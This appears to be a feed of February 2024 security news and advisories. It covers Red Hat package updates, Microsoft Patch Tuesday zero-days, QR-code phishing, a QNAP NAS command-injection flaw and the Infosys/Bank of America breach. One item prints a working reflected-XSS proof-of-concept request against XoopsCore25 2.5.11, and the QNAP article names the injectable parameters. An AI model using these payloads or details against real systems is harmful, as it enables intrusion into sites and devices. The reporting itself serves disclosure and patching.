Red Hat Security Advisory 2024-0798-03 - New Red Hat Single Sign-On 7.6.7 packages are now available for Red Hat Enterprise Linux 7. Issues addressed include bypass, cross site scripting, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0798.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.7 security update on RHEL 7Advisory ID:        RHSA-2024:0798-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0798Issue date:         2024-02-14Revision:           03CVE Names:          CVE-2023-2976====================================================================Summary: New Red Hat Single Sign-On 7.6.7 packages are now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.7 on RHEL 7 serves as a replacement for Red Hat Single Sign-On 7.6.6, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6291)* guava: insecure temporary directory creation (CVE-2023-2976)* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6134)* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)* Log Injection during WebAuthn authentication or registration (CVE-2023-6484)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-2976References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2215229https://bugzilla.redhat.com/show_bug.cgi?id=2236340https://bugzilla.redhat.com/show_bug.cgi?id=2236341https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://bugzilla.redhat.com/show_bug.cgi?id=2248423https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0798-03

Microsoft has issued patches for 73 security vulnerabilities in its February 2024 Patch Tuesday.

Microsoft has issued patches for 73 security vulnerabilities in its February 2024 Patch Tuesday. Among these vulnerabilities are two zero-days that are reportedly being used in the wild.

The two zero-day vulnerabilities have already been added to the Cybersecurity & Infrastructure Security Agency’s catalog of  Known Exploited Vulnerabilities, based on evidence of active exploitation. This means that Federal Civilian Executive Branch (FCEB) agencies need to remediate these vulnerabilities by March 5, 2024, in order to protect their devices.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The zero-days patched in this round of updates are:

CVE-2024-21351 (CVSS score 7.6 out of 10): a Windows SmartScreen security feature bypass vulnerability. The vulnerability allows a malicious actor to inject code into SmartScreen and potentially gain code execution, which could potentially lead to some data exposure, lack of system availability, or both. An authorized attacker must send the user a malicious file and convince the user to open it.

CVE-2024-21412 (CVSS score 8.1 out of 10): an Internet Shortcut Files security feature bypass vulnerability. An unauthenticated attacker could send the targeted user a specially crafted file that is designed to bypass displayed security checks. However, the attacker would have no way to force a user to view the attacker-controlled content. Instead, the attacker would have to convince them to take action by clicking on the file link.

The bypassed security feature in both cases is the Mark of the Web (MOTW), the technology that ensures Windows pops a warning message when trying to open a file downloaded from the Internet. When a file is downloaded, Windows adds a ZoneId in the form of an Alternate Data Stream to the file which is responsible for the warning message(s).

Another vulnerability worth keeping an eye on is CVE-2024-21413 (CVSS score 9.8 out of 10): a Microsoft Outlook remote code execution (RCE) vulnerability. Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and to gain high privileges, which include read, write, and delete functionality. Microsoft notes that the Preview Pane is an attack vector. The update guide for this vulnerability lists a number of required updates before protection is achieved.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Commerce and Magento
*   Adobe Substance 3D Painter
*   Adobe Acrobat and Reader
*   Adobe FrameMaker Publishing Server
*   Adobe Audition 
*   Adobe Substance 3D Designer

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-02-05 or later.

**Ivanti** has urged customers to patch yet another critical vulnerability.

**SAP** has released its February 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Update now! Microsoft fixes two zero-days on February Patch Tuesday 

QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after.

Wednesday, February 14, 2024 08:00

Though QR codes were once on the verge of extinction, many consumers are used to seeing them in the wild for ordering at restaurants, or as mainstays on storefront doors informing customers how they can sign up for a newsletter or score a sweet deal. 

The use of QR codes saw a resurgence during the COVID-19 pandemic as a non-contact way for consumers to obtain important information. And as they’ve become more prevalent, attackers have taken notice, too, increasingly deploying them in phishing and email-based attacks. 

There was a significant increase in QR code phishing in 2023, according to public reporting and recently collected data from Cisco Talos Incident Response (Talos IR).  

As highlighted in our latest Quarterly Trends report, Talos IR responded to a QR code phishing campaign for the first time in an engagement in the fourth quarter of 2023, where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their personal mobile devices, thereby leading to malware being executed on the mobile devices.  

In a separate attack, the adversaries sent targets spear-phishing emails with malicious QR codes pointing to fake Microsoft Office 365 login pages that eventually steal the user’s login credentials when entered.  

QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after. 

**How is a QR code lure different from a traditional malicious attachment or link? **

“Traditional” phishing attacks usually involve an adversary writing a highly targeted email hoping to trick a user into opening a malicious attachment or link that points to an attacker-controlled page. 

Phishing emails, such as business email compromise, are usually meant to impersonate an individual or organization the target is familiar with and willing to open something like a Microsoft Word document or URL that they would normally trust.  

These are typically links included in the body of an email, hyperlinked to a few words of text, or attachments to the emails with text prompting the user to open the attachment. 

In the case of QR code attacks, the adversary embeds a QR code in the body of the phishing email and asks the target to scan it with a mobile device to open a specific attachment or web link. As with any other QR code, the target would have to use a QR code-scanning app on their mobile device or the built-in scanning functions on native camera apps to open the requested link.  

What’s on the end of these QR codes varies greatly. Attackers could use the QR code to point to an attacker-controlled web page that looks like a legitimate login page, but instead steals the user’s credentials when they go to log in. Or it can lead to a malicious attachment that eventually installs malware on the target’s device.  

**What makes the use of QR codes in attacks so dangerous? **

Many corporate-owned computers and devices will have built-in security tools designed to detect phishing and preventing users from opening malicious links. However, when a personal device is introduced to the equation, these tools are no longer effective.  

When the target uses their personal device to scan a malicious QR code, the attack surface shifts, as enterprise security protocols and monitoring systems have less control and visibility over personal devices. And not all email security solutions can detect malicious QR codes like they would with malicious email attachments.  

With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices, making these attacks more likely. According to the 2023 Not (Cyber) Safe for Work Report, which is a quantitative survey performed by the cybersecurity firm Agency, 97 percent of respondents access their work accounts from their personal devices. This potentially exposes sensitive business information in QR code attacks, should adversaries be able to capture internal login credentials or downloaded files on the targeted device.  

**Prevention **

To defend against QR code-based phishing attacks, users and organizations should follow several pieces of advice: 

*   Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information. Cisco Umbrella’s DNS-layer security is available for personal Android and iOS devices, which provides defenders with additional visibility while protecting the privacy of mobile device owners. 
*   User education is at the core of preventing QR code-based phishing attacks. Executives and defenders should ensure all employees are educated on the dangers of phishing attacks and adversaries’ increasing use of QR codes in malicious emails. 
    *   Malicious QR codes may have a poor image quality or look blurry when embedded in an email. This could be an initial sign that the QR code is not legitimate. 
    *   QR code scanners will often provide a preview of the link the code is pointing to. Inform users that they should only be visiting trusted web pages with URLs they recognize. Alternatively, they could use their managed device to manually type in the desired destination URL instead of using the QR code as a navigation method. 
    *   Look for common red flags in phishing emails, such as typosquatted email addresses and typos or grammatical errors in the body text of the email. 
    *   Never give out personal information unless you’ve confirmed the legitimacy of a QR code with the organization in question. 
*   Using multi-factor authentication protocols such as Cisco Duo can prevent credential stealing, which often provides threat actors with an initial foothold into targeted systems to send more convincing phishing emails from trusted business associates or teammates.

How are attackers using QR codes in phishing emails and lure documents?

By Deeba Ahmed
QNAP has released fixes for the zero-day vulnerability, so it's important to install them immediately.
This is a post from HackRead.com Read the original post: Zero-Day in QNAP QTS Affects NAS Devices Globally

Unit 42 researchers discovered a new vulnerability in QNAP devices on 7 November 2023, which was confirmed by the vendor on 19 December 2023, and a security advisory was released subsequently to provide guidance and recommendations.

Palo Alto Networks Unit 42’s Advanced Threat Prevention (ATP) and telemetry systems identified a new zero-day vulnerability in QNAP QTS and QuTS hero firmware from the vendor QNAP. The vulnerability is tracked as **CVE-2023-50358** and affects QNAP Network Attached Storage (NAS) devices.

For your information, QNAP, a company specializing in NAS devices, is known for its QNAP Turbo NAS System (QTS) operating system, which is often embedded in the firmware of QNAP NAS devices.

In its **report** published on 13 February 2024, authors Chao Lei, Jeff Luo, and Zhibin Zhang explained that CVE-2023-50358 is a command injection vulnerability found in the quick.cgi component of QNAP QTS firmware that is accessible without authentication. The vulnerability occurs when the HTTP request parameter todo=set\_timeinfo is set, and the parameter SPECIFIC\_SERVER is saved into a configuration file /tmp/quick/quick\_tmp.conf with the entry name NTP Address.

The component then starts time synchronization using the ntpdate utility, and the command-line execution is ensured by reading the NTP Address in quick\_tmp.conf and system(). Untrusted data from the SPECIFIC\_SERVER parameter helps build a command line, which is executed in the shell, leading to arbitrary command execution.

It is worth noting that this vulnerability affects 289,665 separate IP addresses. The top five countries affected by the vulnerability are Germany, the United States, China, Italy, and Japan.

Proof of command-line execution and heatmap shows the most impacted countries. (Screenshot: Unit 42)

According to Unit 42 researchers threat actors constantly search for vulnerabilities in network-connected hosts, such as NAS devices because these can be exploited quickly. This is why ensuring foolproof security of these devices is necessary.

IoT devices are vulnerable to remote code execution vulnerabilities due to their low attack complexity and critical impact. To protect against these threats, QNAP recommends updating to the latest version of QTS or QuTScloud hero- QTS 5.1.5 or QuTS hero h5.1.5.

****List of Affected Devices****

*   QTS 5.1.x
*   QTS 5.0.1
*   QTS 5.0.0
*   QTS 4.5.x
*   QTS 4.3.6
*   QTS 4.3.4
*   QTS 4.3.x
*   QTS 4.2.x
*   QuTS hero h5.1.x
*   QuTS hero h5.0.1
*   QuTS hero h5.0.0
*   QuTS hero h4.x

QNAP has **released** a security advisory, advising affected organizations to follow mitigation instructions or apply firmware updates. 

“Multiple vulnerabilities have been reported to affect several QNAP operating system versions. If exploited, the OS command injection vulnerabilities could allow users to execute commands via a network.”

In its advisory, the vendor noted fixing two vulnerabilities, CVE-2023-47218 and CVE-2023-50358 and explained how to implement the fixes.

“If you do not want to install a fully fixed version for your device, you can still mitigate the vulnerabilities by installing a partially fixed version. However, note that the vulnerabilities still exist during the installation process of a partially fixed version. The vulnerabilities only disappear after installation is complete.”

1.  **CISA and Fortinet Warns of New FortiOS Zero-Day Flaws**
2.  **Ivanti VPN Flaws Exploited by DSLog Backdoor and Crypto Miners**
3.  **Hackers Uncover Airbus EFB App Vulnerability, Risking Aircraft Data**
4.  **Ethical Hackers Reported 835 Vulnerabilities, Earned $450K in 2023**
5.  **Smart Helmets Flaw Exposed Millions to Risk of Hacking and Surveillance**

Zero-Day in QNAP QTS Affects NAS Devices Globally

By Waqas
Bank of America customers participating in deferred compensation plans are the main victims of this data breach.
This is a post from HackRead.com Read the original post: Infosys Data Breach Impacts 57,000 Bank of America Customers

In November 2023, the Lockbit ransomware gang claimed responsibility for targeting the Infosys McCamish system, and it appears that the aftermath of the data breach is unfolding.

Bank of America customers participating in deferred compensation plans are facing concerns after a data breach at Infosys McCamish Systems (IMS), a third-party provider managing these plans. The incident, initially reported in November 2023 but only publicly disclosed this month, exposed the personal information of 57,028 individuals.

The latest incident shouldn’t be surprising, given that Bank of America is a lucrative and highly sought-after target for both script kiddies and sophisticated cybercriminals. The data breach in May 2020 serves as a notable precedent, as does the continuing series of phishing attacks targeting the bank’s customers.

****What Happened:****

In a letter sent by Infosys McCamish to affected customers, on November 3rd, 2023, an unauthorized third party infiltrated the IMS systems, accessing sensitive customer data. The information potentially compromised includes names, addresses, social security numbers, dates of birth, financial details linked to deferred compensation plans and other account information.

According to the data breach notification filed by the company with Maine’s Attorney General, 93 residents of Maine have been impacted by the data breach. The information trove could be used for a variety of malicious activities, including identity theft, financial fraud, and phishing scams. Although the specific nature of the security lapse remains unclear, IMS has implemented measures to prevent future breaches.

****Affected Individuals:****

While the exact number of affected Bank of America customers is known (57,028), the extent of data accessed for each individual remains uncertain. IMS claims they cannot determine which specific pieces of information were viewed by the unauthorized party.

However, it is worth noting that on November 4, the LockBit ransomware gang claimed responsibility for the IMS attack, stating that its operators encrypted over 2,000 systems during the breach.

****Bank of America’s Response:****

Bank of America learned of the breach on November 24th, 2023, and has since taken steps to notify affected customers. The bank is offering complimentary two-year memberships to Experian’s identity theft protection services to help mitigate potential risks. Additionally, they recommend that customers remain vigilant and monitor their accounts for suspicious activity.

****Experts Provide Insight on the Data Breach:****

For insights into the latest development, we spoke with Tim Callan, Chief Experience Officer at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM), who raised questions about the cybersecurity measures at third parties.

“As financial institutions increasingly rely on third-party vendors for various services, they inadvertently broaden their attack surface, exposing sensitive customer data to potential breaches. Strengthening oversight and implementing stringent security protocols for third-party partnerships are imperative to mitigate such risks,” Tim Advised.

Al Lakhani, CEO of IDEE, emphasized the limitations of traditional multi-factor authentication (MFA) systems and advocated for next-generation MFA solutions to protect the supply chain.

“Protecting the supply chain is critical. Especially when they can cause these kinds of attacks. Therefore, relying on first-generation MFA that requires two devices and lacks the capability to prevent credential phishing attacks is a non-starter,” Al explained. “To fortify supply chains effectively, they must be protected using next-generation MFA solutions, which protect against credential, phishing and password-based attacks, including adversary-in-the-middle attacks by using same device MFA,” he said.

****Ongoing Concerns:****

Despite Bank of America’s response, concerns remain for impacted individuals. The lack of clarity regarding which data was accessed and the possibility of misuse are significant sources of anxiety. The potential for financial losses, identity theft, and other negative consequences cannot be ignored.

****Industry Implications:****

This incident highlights the growing threat of data breaches within the financial services industry. It underscores the importance of strong cybersecurity measures for both financial institutions and third-party providers like IMS. The reliance on third-party services introduces additional vulnerabilities, requiring stringent data security protocols and comprehensive risk management strategies.

****Looking Forward:****

While the immediate impact of the breach remains to be seen, it serves as a stark reminder of the importance of data privacy and security. Individuals are advised to remain vigilant, monitor their accounts closely, and utilize the resources offered by Bank of America.

Additionally, this incident emphasizes the need for stricter regulations and enhanced security protocols within the financial services industry to protect customer data and prevent future breaches.

1.  **Lockbit Ransomware Leaks Boeing Data Trove**
2.  **LockBit Ransomware Gang Claims Subway as New Victim**
3.  **‘Important Notification’ Phishing Scam Hits American Express**
4.  **Bank of America Phishing Link Stealing Customers’ Personal Data**
5.  **World’s Largest Bank ICBC Discloses Crippling Ransomware Attack**

Infosys Data Breach Impacts 57,000 Bank of America Customers

Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

**Microsoft Corp.** today pushed software updates to plug more than 70 security holes in its **Windows** operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

Top of the heap on this Fat Patch Tuesday is CVE-2024-21412, a “security feature bypass” in the way Windows handles Internet Shortcut Files that Microsoft says is being targeted in active exploits. Redmond’s advisory for this bug says an attacker would need to convince or trick a user into opening a malicious shortcut file.

Researchers at Trend Micro have tied the ongoing exploitation of CVE-2024-21412 to an advanced persistent threat group dubbed “**Water Hydra**,” which they say has being using the vulnerability to execute a malicious Microsoft Installer File (.msi) that in turn unloads a remote access trojan (RAT) onto infected Windows systems.

The other zero-day flaw is CVE-2024-21351, another security feature bypass — this one in the built-in **Windows SmartScreen** component that tries to screen out potentially malicious files downloaded from the Web. **Kevin Breen** at **Immersive Labs** says it’s important to note that this vulnerability alone is not enough for an attacker to compromise a user’s workstation, and instead would likely be used in conjunction with something like a spear phishing attack that delivers a malicious file.

**Satnam Narang**, senior staff research engineer at **Tenable**, said this is the fifth vulnerability in Windows SmartScreen patched since 2022 and all five have been exploited in the wild as zero-days. They include CVE-2022-44698 in December 2022, CVE-2023-24880 in March 2023, CVE-2023-32049 in July 2023 and CVE-2023-36025 in November 2023.

Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in **Microsoft Exchange Server** that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

“We know that flaws that can disclose sensitive information like NTLM hashes are very valuable to attackers,” Narang said. “A Russian-based threat actor leveraged a similar vulnerability to carry out attacks – CVE-2023-23397 is an Elevation of Privilege vulnerability in Microsoft Outlook patched in March 2023.”

Microsoft notes that prior to its Exchange Server 2019 Cumulative Update 14 (CU14), a security feature called Extended Protection for Authentication (EPA), which provides NTLM credential relay protections, was not enabled by default.

“Going forward, CU14 enables this by default on Exchange servers, which is why it is important to upgrade,” Narang said.

Rapid7’s lead software engineer **Adam Barnett** highlighted CVE-2024-21413, a critical remote code execution bug in **Microsoft Office** that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

“Microsoft Office typically shields users from a variety of attacks by opening files with Mark of the Web in Protected View, which means Office will render the document without fetching potentially malicious external resources,” Barnett said. “CVE-2024-21413 is a critical RCE vulnerability in Office which allows an attacker to cause a file to open in editing mode as though the user had agreed to trust the file.”

Barnett stressed that administrators responsible for Office 2016 installations who apply patches outside of Microsoft Update should note the advisory lists no fewer than five separate patches which must be installed to achieve remediation of CVE-2024-21413; individual update knowledge base (KB) articles further note that partially-patched Office installations will be blocked from starting until the correct combination of patches has been installed.

It’s a good idea for Windows end-users to stay current with security updates from Microsoft, which can quickly pile up otherwise. That doesn’t mean you have to install them on Patch Tuesday. Indeed, waiting a day or three before updating is a sane response, given that sometimes updates go awry and usually within a few days Microsoft has fixed any issues with its patches. It’s also smart to back up your data and/or image your Windows drive before applying new updates.

For a more detailed breakdown of the individual flaws addressed by Microsoft today, check out the SANS Internet Storm Center’s list. For those admins responsible for maintaining larger Windows environments, it often pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users.

Fat Patch Tuesday, February 2024 Edition

XoopsCore25 version 2.5.11 suffers from a cross site scripting vulnerability.

    ## Title: XoopsCore25-2.5.11-XSS-Reflected## Author: nu11secur1ty## Date: 02/12/2024## Vendor: https://xoops.org/## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:The value of the yname request parameter is copied into the value ofan HTML tag attribute which is encapsulated in single quotation marks.The payload '>333< was submitted in the yname parameter. This inputwas echoed unmodified in the application's response. The attacker cantrick the user to visit very dangerous and malicious URL in thissessionSTATUS: HIGH Vulnerability[+]Exploit execution:```POSTPOST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160Safari/537.36Connection: closeCache-Control: max-age=0Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmnOrigin: https://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563Content-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 148yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)## Time spent:01:17:00

XoopsCore25 2.5.11 Cross Site Scripting

Red Hat Security Advisory 2024-0778-03 - An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12. Issues addressed include bypass, code execution, cross site request forgery, cross site scripting, denial of service, improper authorization, information leakage, insecure permissions, and open redirection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0778.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Jenkins and Jenkins-2-plugins security update  
Advisory ID:        RHSA-2024:0778-03  
Product:            OpenShift Developer Tools and Services  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0778  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2020-7692  
====================================================================

Summary: 

An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization (CVE-2020-7692)

* maven: Block repositories using http by default (CVE-2021-26291)

* snakeyaml: Denial of Service due to missing nested depth limitation for collections (CVE-2022-25857)

* maven-shared-utils: Command injection via Commandline class (CVE-2022-29599)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin (CVE-2023-24422)

* jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE (CVE-2024-23897)

* jenkins: cross-site WebSocket hijacking (CVE-2024-23898)

* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)

* guava: insecure temporary directory creation (CVE-2023-2976)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

* spring-security: Empty SecurityContext Is Not Properly Saved Upon Logout (CVE-2023-20862)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin (CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin (CVE-2023-25762)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* Jenkins: Open redirect vulnerability in OpenShift Login Plugin (CVE-2023-37947)

* jetty: Improper validation of HTTP/1 content-length (CVE-2023-40167)

* jenkins-plugins: cloudbees-folder: CSRF vulnerability in Folders Plugin (CVE-2023-40337)

* jenkins-plugins: cloudbees-folder: Information disclosure in Folders Plugin (CVE-2023-40338)

* jenkins-plugins: config-file-provider: Improper masking of credentials in Config File Provider Plugin (CVE-2023-40339)

* jenkins-plugins: blueocean: CSRF vulnerability in Blue Ocean Plugin allows capturing credentials (CVE-2023-40341)

* Jenkins: Temporary file parameter created with insecure permissions (CVE-2023-27903)

* Jenkins: Information disclosure through error stack traces related to agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-7692

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=1856376  
https://bugzilla.redhat.com/show_bug.cgi?id=1955739  
https://bugzilla.redhat.com/show_bug.cgi?id=2066479  
https://bugzilla.redhat.com/show_bug.cgi?id=2107376  
https://bugzilla.redhat.com/show_bug.cgi?id=2126789  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2164278  
https://bugzilla.redhat.com/show_bug.cgi?id=2170039  
https://bugzilla.redhat.com/show_bug.cgi?id=2170041  
https://bugzilla.redhat.com/show_bug.cgi?id=2177632  
https://bugzilla.redhat.com/show_bug.cgi?id=2177634  
https://bugzilla.redhat.com/show_bug.cgi?id=2180530  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2222710  
https://bugzilla.redhat.com/show_bug.cgi?id=2227788  
https://bugzilla.redhat.com/show_bug.cgi?id=2232422  
https://bugzilla.redhat.com/show_bug.cgi?id=2232423  
https://bugzilla.redhat.com/show_bug.cgi?id=2232425  
https://bugzilla.redhat.com/show_bug.cgi?id=2232426  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2239634  
https://bugzilla.redhat.com/show_bug.cgi?id=2260180  
https://bugzilla.redhat.com/show_bug.cgi?id=2260182  
https://issues.redhat.com/browse/JKNS-271  
https://issues.redhat.com/browse/JKNS-289  
https://issues.redhat.com/browse/OCPBUGS-10976  
https://issues.redhat.com/browse/OCPBUGS-11158  
https://issues.redhat.com/browse/OCPBUGS-11348  
https://issues.redhat.com/browse/OCPBUGS-1357  
https://issues.redhat.com/browse/OCPBUGS-13652  
https://issues.redhat.com/browse/OCPBUGS-13901  
https://issues.redhat.com/browse/OCPBUGS-14113  
https://issues.redhat.com/browse/OCPBUGS-14393  
https://issues.redhat.com/browse/OCPBUGS-14642  
https://issues.redhat.com/browse/OCPBUGS-15648  
https://issues.redhat.com/browse/OCPBUGS-1709  
https://issues.redhat.com/browse/OCPBUGS-1942  
https://issues.redhat.com/browse/OCPBUGS-2099  
https://issues.redhat.com/browse/OCPBUGS-2184  
https://issues.redhat.com/browse/OCPBUGS-2318  
https://issues.redhat.com/browse/OCPBUGS-27391  
https://issues.redhat.com/browse/OCPBUGS-3692  
https://issues.redhat.com/browse/OCPBUGS-4819  
https://issues.redhat.com/browse/OCPBUGS-4833  
https://issues.redhat.com/browse/OCPBUGS-655  
https://issues.redhat.com/browse/OCPBUGS-6632  
https://issues.redhat.com/browse/OCPBUGS-6982  
https://issues.redhat.com/browse/OCPBUGS-7016  
https://issues.redhat.com/browse/OCPBUGS-7050  
https://issues.redhat.com/browse/OCPBUGS-710  
https://issues.redhat.com/browse/OCPBUGS-8420  
https://issues.redhat.com/browse/OCPBUGS-8497  
https://issues.redhat.com/browse/OCPTOOLS-246

Red Hat Security Advisory 2024-0778-03

Red Hat Security Advisory 2024-0774-03 - An update is now available for Red Hat Certificate System 10.4 for RHEL 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a memory leak vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0774.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat Certificate System 10.4 for RHEL 8 security and bug fix update  
Advisory ID:        RHSA-2024:0774-03  
Product:            Red Hat Certificate System  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0774  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2021-4213  
====================================================================

Summary: 

An update is now available for Red Hat Certificate System 10.4 for RHEL 8.  
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

Description:

Red Hat Certificate System (RHCS) is a complete implementation of an enterprise software system designed to manage enterprise Public Key Infrastructure (PKI) deployments.

Security fixes:

* JSS: memory leak in TLS connection leads to OOM (CVE-2021-4213)

* pki-core:10.6/jss: memory leak in TLS connection leads to OOM (CVE-2021-4213)

For more details about the security issues, refer to the link in the References section.

Bug fixes:

* no ROLE_ASSUME audit messages seen in TPS audit log (BZ#1549887)

* Unassign certificate enrollment request not working (BZ#1858702)

